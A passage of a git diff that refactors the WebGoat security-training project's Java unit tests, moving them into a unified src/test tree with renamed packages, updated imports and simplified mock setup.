@@ -8,14 +8,14 @@ import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.Mockito;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.service.HintService.URL_HINTS_MVC;
+import static org.owasp.webgoat.container.service.HintService.URL_HINTS_MVC;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
@@ -48,4 +48,4 @@ public class HintServiceTest {
                 .andExpect(jsonPath("$[0].hint", CoreMatchers.is("hint 1")))
                 .andExpect(jsonPath("$[0].assignmentPath", CoreMatchers.is("/HttpBasics/attack1")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
similarity index 89%
rename from webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
rename to src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
index 124765e65..593f27539 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonMenuServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/LessonMenuServiceTest.java
@@ -19,7 +19,7 @@
  *
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import com.beust.jcommander.internal.Lists;
 import org.hamcrest.CoreMatchers;
@@ -29,13 +29,13 @@ import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.Mockito;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.Course;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.LessonTracker;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.Course;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.LessonTracker;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -43,7 +43,7 @@ import java.util.Arrays;
 
 import static org.mockito.ArgumentMatchers.any;
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.service.LessonMenuService.URL_LESSONMENU_MVC;
+import static org.owasp.webgoat.container.service.LessonMenuService.URL_LESSONMENU_MVC;
 import static org.springframework.test.web.servlet.result.MockMvcResultHandlers.print;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
@@ -101,4 +101,4 @@ public class LessonMenuServiceTest {
                 .andExpect(status().isOk()).andDo(print())
                 .andExpect(jsonPath("$[0].children[0].complete", CoreMatchers.is(true)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java
similarity index 89%
rename from webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
rename to src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java
index b0a73dea6..3672e733f 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/LessonProgressServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/LessonProgressServiceTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import org.assertj.core.util.Maps;
 import org.junit.jupiter.api.BeforeEach;
@@ -6,12 +6,12 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.LessonTracker;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.LessonTracker;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.http.MediaType;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -76,7 +76,6 @@ class LessonProgressServiceTest {
         when(userTrackerRepository.findByUser(any())).thenReturn(userTracker);
         when(userTracker.getLessonTracker(any(Lesson.class))).thenReturn(lessonTracker);
         when(websession.getCurrentLesson()).thenReturn(lesson);
-        when(lesson.getAssignments()).thenReturn(List.of(assignment));
         when(lessonTracker.getLessonOverview()).thenReturn(Maps.newHashMap(assignment, true));
         this.mockMvc = MockMvcBuilders.standaloneSetup(new LessonProgressService(userTrackerRepository, websession)).build();
     }
@@ -89,4 +88,4 @@ class LessonProgressServiceTest {
                 .andExpect(jsonPath("$[0].solved", is(true)));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java b/src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java
similarity index 86%
rename from webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
rename to src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java
index 47e9bb439..86c0b57f0 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/service/ReportCardServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/service/ReportCardServiceTest.java
@@ -1,17 +1,17 @@
-package org.owasp.webgoat.service;
+package org.owasp.webgoat.container.service;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.session.Course;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.users.LessonTracker;
-import org.owasp.webgoat.users.UserTracker;
-import org.owasp.webgoat.users.UserTrackerRepository;
+import org.owasp.webgoat.container.i18n.PluginMessages;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.session.Course;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.LessonTracker;
+import org.owasp.webgoat.container.users.UserTracker;
+import org.owasp.webgoat.container.users.UserTrackerRepository;
 import org.springframework.security.test.context.support.WithMockUser;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/session/LabelDebuggerTest.java b/src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java
similarity index 95%
rename from webgoat-container/src/test/java/org/owasp/webgoat/session/LabelDebuggerTest.java
rename to src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java
index 04fb5daba..593e6d88d 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/session/LabelDebuggerTest.java
+++ b/src/test/java/org/owasp/webgoat/container/session/LabelDebuggerTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.session;
+package org.owasp.webgoat.container.session;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/session/LessonTrackerTest.java b/src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java
similarity index 93%
rename from webgoat-container/src/test/java/org/owasp/webgoat/session/LessonTrackerTest.java
rename to src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java
index d14b70564..b02ba2e72 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/session/LessonTrackerTest.java
+++ b/src/test/java/org/owasp/webgoat/container/session/LessonTrackerTest.java
@@ -1,10 +1,10 @@
-package org.owasp.webgoat.session;
+package org.owasp.webgoat.container.session;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.lessons.Lesson;
-import org.owasp.webgoat.users.LessonTracker;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Lesson;
+import org.owasp.webgoat.container.users.LessonTracker;
 
 import java.util.List;
 import java.util.Map;
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserRepositoryTest.java b/src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java
similarity index 79%
rename from webgoat-container/src/test/java/org/owasp/webgoat/users/UserRepositoryTest.java
rename to src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java
index 9ab886214..3025c243d 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserRepositoryTest.java
@@ -1,13 +1,15 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.WebGoat;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 import org.springframework.test.context.ActiveProfiles;
+import org.springframework.test.context.ContextConfiguration;
 
 @DataJpaTest
-@ActiveProfiles({"test", "webgoat"})
+@ActiveProfiles("webgoat-test")
 class UserRepositoryTest {
 
     @Autowired
@@ -23,4 +25,4 @@ class UserRepositoryTest {
         Assertions.assertThat(user.getUsername()).isEqualTo("test");
         Assertions.assertThat(user.getPassword()).isEqualTo("password");
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserServiceTest.java b/src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java
similarity index 83%
rename from webgoat-container/src/test/java/org/owasp/webgoat/users/UserServiceTest.java
rename to src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java
index 3123cb851..29a8ed5f5 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserServiceTest.java
@@ -1,16 +1,16 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import org.assertj.core.api.Assertions;
 import org.flywaydb.core.Flyway;
-import org.flywaydb.core.api.configuration.FluentConfiguration;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mock;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.springframework.context.ApplicationEventPublisher;
+import org.owasp.webgoat.container.lessons.Initializeable;
 import org.springframework.jdbc.core.JdbcTemplate;
 import org.springframework.security.core.userdetails.UsernameNotFoundException;
 
+import java.util.List;
 import java.util.function.Function;
 
 import static org.mockito.ArgumentMatchers.any;
@@ -31,7 +31,7 @@ class UserServiceTest {
     @Test
     void shouldThrowExceptionWhenUserIsNotFound() {
         when(userRepository.findByUsername(any())).thenReturn(null);
-        UserService userService = new UserService(userRepository, userTrackerRepository, jdbcTemplate, flywayLessons);
+        UserService userService = new UserService(userRepository, userTrackerRepository, jdbcTemplate, flywayLessons, List.of());
         Assertions.assertThatThrownBy(() -> userService.loadUserByUsername("unknown")).isInstanceOf(UsernameNotFoundException.class);
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java b/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
similarity index 91%
rename from webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
rename to src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
index bad733b52..7da75dc92 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserTrackerRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserTrackerRepositoryTest.java
@@ -1,11 +1,11 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import org.assertj.core.api.Assertions;
 import org.assertj.core.util.Lists;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.Assignment;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Assignment;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 import org.springframework.test.context.ActiveProfiles;
@@ -13,7 +13,7 @@ import org.springframework.test.context.ActiveProfiles;
 import java.util.List;
 
 @DataJpaTest
-@ActiveProfiles({"test", "webgoat"})
+@ActiveProfiles("webgoat-test")
 class UserTrackerRepositoryTest {
 
     private class TestLesson extends Lesson {
@@ -80,4 +80,4 @@ class UserTrackerRepositoryTest {
         Assertions.assertThat(userTracker.getLessonTracker(lesson).getNumberOfAttempts()).isEqualTo(4);
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java b/src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java
similarity index 98%
rename from webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java
rename to src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java
index d705b23d4..e9c3c94e5 100644
--- a/webgoat-container/src/test/java/org/owasp/webgoat/users/UserValidatorTest.java
+++ b/src/test/java/org/owasp/webgoat/container/users/UserValidatorTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.users;
+package org.owasp.webgoat.container.users;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
@@ -57,4 +57,4 @@ class UserValidatorTest {
         assertThat(errors.getFieldError("username").getCode()).isEqualTo("username.duplicate");
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/auth-bypass/src/test/org/owasp/webgoat/auth_bypass/BypassVerificationTest.java b/src/test/java/org/owasp/webgoat/lessons/auth_bypass/BypassVerificationTest.java
similarity index 78%
rename from webgoat-lessons/auth-bypass/src/test/org/owasp/webgoat/auth_bypass/BypassVerificationTest.java
rename to src/test/java/org/owasp/webgoat/lessons/auth_bypass/BypassVerificationTest.java
index 2cf46c450..59b22484b 100644
--- a/webgoat-lessons/auth-bypass/src/test/org/owasp/webgoat/auth_bypass/BypassVerificationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/auth_bypass/BypassVerificationTest.java
@@ -23,24 +23,15 @@
  * <p>
  */
 
-package org.owasp.webgoat.auth_bypass;
+package org.owasp.webgoat.lessons.auth_bypass;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.Before;
+import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.runner.RunWith;
-import org.mockito.runners.MockitoJUnitRunner;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
-import org.springframework.boot.test.context.TestComponent;
-import org.springframework.http.MediaType;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.mockito.junit.jupiter.MockitoExtension;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
 import org.springframework.test.web.servlet.MockMvc;
-import org.springframework.test.web.servlet.ResultActions;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
 @ExtendWith(MockitoExtension.class)
diff --git a/webgoat-lessons/bypass-restrictions/src/test/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java b/src/test/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
similarity index 84%
rename from webgoat-lessons/bypass-restrictions/src/test/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
rename to src/test/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
index 959465030..a4f8c89d6 100644
--- a/webgoat-lessons/bypass-restrictions/src/test/java/org/owasp/webgoat/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/bypass_restrictions/BypassRestrictionsFrontendValidationTest.java
@@ -1,11 +1,8 @@
-package org.owasp.webgoat.bypass_restrictions;
+package org.owasp.webgoat.lessons.bypass_restrictions;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
+import org.owasp.webgoat.container.plugins.LessonTest;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
@@ -18,15 +15,11 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author nbaars
  * @since 6/16/17.
  */
-@ExtendWith(SpringExtension.class)
 public class BypassRestrictionsFrontendValidationTest extends LessonTest {
 
-    @Autowired
-    private BypassRestrictions bypassRestrictions;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(bypassRestrictions);
+        when(webSession.getCurrentLesson()).thenReturn(new BypassRestrictions());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -73,4 +66,4 @@ public class BypassRestrictionsFrontendValidationTest extends LessonTest {
     }
 
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/challenge/src/test/java/org/owasp/webgoat/challenges/Assignment1Test.java b/src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java
similarity index 91%
rename from webgoat-lessons/challenge/src/test/java/org/owasp/webgoat/challenges/Assignment1Test.java
rename to src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java
index 85f0601c6..c52429491 100644
--- a/webgoat-lessons/challenge/src/test/java/org/owasp/webgoat/challenges/Assignment1Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/challenges/Assignment1Test.java
@@ -20,16 +20,18 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.challenges;
+package org.owasp.webgoat.lessons.challenges;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.challenges.challenge1.Assignment1;
-import org.owasp.webgoat.challenges.challenge1.ImageServlet;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.challenges.Flag;
+import org.owasp.webgoat.lessons.challenges.SolutionConstants;
+import org.owasp.webgoat.lessons.challenges.challenge1.Assignment1;
+import org.owasp.webgoat.lessons.challenges.challenge1.ImageServlet;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -95,4 +97,4 @@ class Assignment1Test extends AssignmentEndpointTest {
 //                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
 //    }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/chrome-dev-tools/src/test/java/org/owasp/webgoat/chrome_dev_tools/ChromeDevToolsTest.java b/src/test/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevToolsTest.java
similarity index 86%
rename from webgoat-lessons/chrome-dev-tools/src/test/java/org/owasp/webgoat/chrome_dev_tools/ChromeDevToolsTest.java
rename to src/test/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevToolsTest.java
index 2655ae707..aec51b02d 100644
--- a/webgoat-lessons/chrome-dev-tools/src/test/java/org/owasp/webgoat/chrome_dev_tools/ChromeDevToolsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/chrome_dev_tools/ChromeDevToolsTest.java
@@ -1,10 +1,11 @@
-package org.owasp.webgoat.chrome_dev_tools;
+package org.owasp.webgoat.lessons.chrome_dev_tools;
 
 import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.chrome_dev_tools.ChromeDevTools;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -21,12 +22,9 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(SpringExtension.class)
 public class ChromeDevToolsTest extends LessonTest {
 
-    @Autowired
-    private ChromeDevTools cdt;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(cdt);
+        when(webSession.getCurrentLesson()).thenReturn(new ChromeDevTools());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -48,4 +46,4 @@ public class ChromeDevToolsTest extends LessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", Matchers.is(false)));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/cia/src/test/java/org/owasp/webgoat/cia/CIAQuizTest.java b/src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java
similarity index 94%
rename from webgoat-lessons/cia/src/test/java/org/owasp/webgoat/cia/CIAQuizTest.java
rename to src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java
index 16d187b24..9ea02808c 100644
--- a/webgoat-lessons/cia/src/test/java/org/owasp/webgoat/cia/CIAQuizTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/cia/CIAQuizTest.java
@@ -1,11 +1,8 @@
-package org.owasp.webgoat.cia;
+package org.owasp.webgoat.lessons.cia;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
+import org.owasp.webgoat.container.plugins.LessonTest;
 import org.springframework.test.web.servlet.MvcResult;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
@@ -19,15 +16,11 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author Benedikt Stuhrmann
  * @since 13/03/19.
  */
-@ExtendWith(SpringExtension.class)
 public class CIAQuizTest extends LessonTest {
 
-    @Autowired
-    private CIA cia;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(cia);
+        when(webSession.getCurrentLesson()).thenReturn(new CIA());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -200,4 +193,4 @@ public class CIAQuizTest extends LessonTest {
         assertThat(responseString).isEqualTo("[ false, false, false, false ]");
     }
 
-} // end class
\ No newline at end of file
+} // end class
diff --git a/webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignmentTest.java
similarity index 79%
rename from webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignmentTest.java
index 805d5986a..0c1c70ee3 100644
--- a/webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringAssignmentTest.java
@@ -1,32 +1,29 @@
-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.client_side_filtering.ClientSideFiltering;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
+import static org.owasp.webgoat.lessons.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 
 /**
  * @author nbaars
  * @since 5/2/17.
  */
-@ExtendWith(SpringExtension.class)
 public class ClientSideFilteringAssignmentTest extends LessonTest {
 
-    @Autowired
-    private ClientSideFiltering clientSideFiltering;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(clientSideFiltering);
+        when(webSession.getCurrentLesson()).thenReturn(new ClientSideFiltering());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -44,4 +41,4 @@ public class ClientSideFilteringAssignmentTest extends LessonTest {
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
similarity index 86%
rename from webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
index 41c02c05d..a8314aa4c 100644
--- a/webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ClientSideFilteringFreeAssignmentTest.java
@@ -1,11 +1,12 @@
-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.client_side_filtering.ClientSideFiltering;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -14,15 +15,11 @@ import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 
-@ExtendWith(SpringExtension.class)
 public class ClientSideFilteringFreeAssignmentTest extends LessonTest {
 
-    @Autowired
-    private ClientSideFiltering clientSideFiltering;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(clientSideFiltering);
+        when(webSession.getCurrentLesson()).thenReturn(new ClientSideFiltering());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -47,4 +44,4 @@ public class ClientSideFilteringFreeAssignmentTest extends LessonTest {
                 .andExpect(jsonPath("$[0]", Matchers.hasKey("UserID")))
                 .andExpect(jsonPath("$.length()", CoreMatchers.is(12)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ShopEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpointTest.java
similarity index 89%
rename from webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ShopEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpointTest.java
index 41324a305..0a8102337 100644
